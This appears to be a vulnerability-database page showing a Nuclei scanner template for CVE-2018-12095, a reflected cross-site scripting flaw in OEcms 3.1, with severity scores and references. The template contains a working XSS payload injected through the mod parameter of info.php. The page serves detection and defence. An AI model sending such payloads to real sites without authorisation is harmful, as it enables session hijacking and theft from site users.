Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-12095
HistoryAug 24, 2021 - 5:29 p.m.

OEcms 3.1 - Cross-Site Scripting

2021-08-2417:29:51
ProjectDiscovery
github.com
1

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

70.6%

OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php.

id: CVE-2018-12095

info:
  name: OEcms 3.1 - Cross-Site Scripting
  author: LogicalHunter
  severity: medium
  description: OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest patch or upgrade to a newer version of OEcms to fix the XSS vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/44895
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095
    - https://cxsecurity.com/issue/WLB-2018060092
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12095
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2018-12095
    cwe-id: CWE-79
    epss-score: 0.00333
    epss-percentile: 0.70604
    cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oecms_project
    product: oecms
  tags: cve2018,cve,xss,edb,oecms_project

http:
  - method: GET
    path:
      - '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206cbd123e860c5657ebdbbfa98574fb5663ab2209adc3b40b143af0bad366355e022100db1434e013133eadf65a81ddda4ff57c1d48bfdd5f490d4252d757ede09fd48d:922c64590222798bb761d5b6d8e72950

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

70.6%